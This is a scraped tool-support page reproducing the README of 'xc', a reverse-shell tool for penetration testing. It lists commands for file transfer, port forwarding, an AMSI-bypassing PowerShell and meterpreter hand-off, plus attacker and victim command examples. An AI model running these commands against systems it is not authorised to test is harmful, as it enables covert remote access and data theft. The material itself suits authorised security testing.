Need help with xc?
Click the “chat” button below for chat support from the developer who created it, or find similar developers for support.

About the developer

xct
255 Stars 47 Forks 38 Commits 1 Opened issues

Description

A small reverse shell for Linux & Windows

Services available

!
?

Need anything else?

Contributors list

# 265,050
Python
Go
25 commits
# 92,903
pentest...
winrm
assembl...
webasse...
5 commits
# 159,743
cve
Shell
fuzzer
C++
2 commits

XC

Netcat like reverse shell for Linux & Windows.

Features

Windows

Usage:
└ Shared Commands:  !exit
  !upload  
   * uploads a file to the target
  !download  
   * downloads a file from the target
  !lfwd   
   * local portforwarding (like ssh -L)
  !rfwd   
   * remote portforwarding (like ssh -R)
  !lsfwd
   * lists active forwards
  !rmfwd 
   * removes forward by index
  !plugins
   * lists available plugins
  !plugin 
   * execute a plugin
  !spawn 
   * spawns another client on the specified port
  !shell
   * runs /bin/sh
  !runas   
   * restart xc with the specified user
  !met 
   * connects to a x64/meterpreter/reverse_tcp listener
└ OS Specific Commands:
  !powershell
    * starts powershell with AMSI Bypass
  !rc 
    * connects to a local bind shell and restarts this client over it
  !runasps   
    * restart xc with the specified user using powershell
  !vulns
    * checks for common vulnerabilities

Linux

Usage:
└ Shared Commands:  !exit
  !upload  
   * uploads a file to the target
  !download  
   * downloads a file from the target
  !lfwd   
   * local portforwarding (like ssh -L)
  !rfwd   
   * remote portforwarding (like ssh -R)
  !lsfwd
   * lists active forwards
  !rmfwd 
   * removes forward by index
  !plugins
   * lists available plugins
  !plugin 
   * execute a plugin
  !spawn 
   * spawns another client on the specified port
  !shell
   * runs /bin/sh
  !runas   
   * restart xc with the specified user
  !met 
   * connects to a x64/meterpreter/reverse_tcp listener
└ OS Specific Commands:
 !ssh 
   * starts sshd with the configured keys on the specified port

Examples

  • Linux Attacker:
    rlwrap xc -l -p 1337
    (Server)
  • WindowsVictim :
    xc.exe 10.10.14.4 1337
    (Client)
  • Argumentless:
    xc_10.10.14.4_1337.exe
    (Client)

Setup

Make sure you are running golang version 1.15+, older versions will not compile. I tested it on ubuntu:

go version go1.16.2 linux/amd64
and kali
go version go1.15.9 linux/amd64
git clone --recurse-submodules https://github.com/xct/xc.git

GO111MODULE=off go get golang.org/x/sys/... GO111MODULE=off go get golang.org/x/text/encoding/unicode GO111MODULE=off go get github.com/hashicorp/yamux sudo apt-get install rlwrap upx

Linux:

python3 build.py

Known Issues

  • When !lfwd fails due to lack of permissions (missing sudo), the entry in !lsfwd is still created
  • Can't Ctrl+C out of powershell started from !shell
  • !net (execute-assembly) fails after using it a few times - for now you can !restart and it might work again
  • Tested:
    • Kali (Attacker) Win 10 (Victim)

Credits

  • Included PrivescCheck by itm4n for Windows Clients: https://github.com/itm4n/PrivescCheck

We use cookies. If you continue to browse the site, you agree to the use of cookies. For more information on our use of cookies please see our Privacy Policy.